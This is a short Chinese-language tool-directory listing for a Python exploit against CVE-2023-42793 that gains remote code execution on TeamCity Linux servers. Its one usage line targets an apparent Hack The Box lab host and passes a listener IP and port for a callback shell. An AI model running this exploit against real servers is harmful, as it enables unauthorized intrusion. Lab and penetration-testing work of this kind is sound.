黑客、渗透测试和网络安全工具,武装您的安全武器库!
针对 CVE-2023-42793 的 Python 漏洞利用程序,通过将有效载荷编码到 URL 中并发送至目标,从而在 TeamCity Linux 服务器上实现远程代码执行。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
你需要先通过使用不同的漏洞利用来获取令牌。然而,以下漏洞利用将允许你获取对 Linux 服务器的 RCE,因为它将有效载荷编码在 URL 中并将其发送到服务器。
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT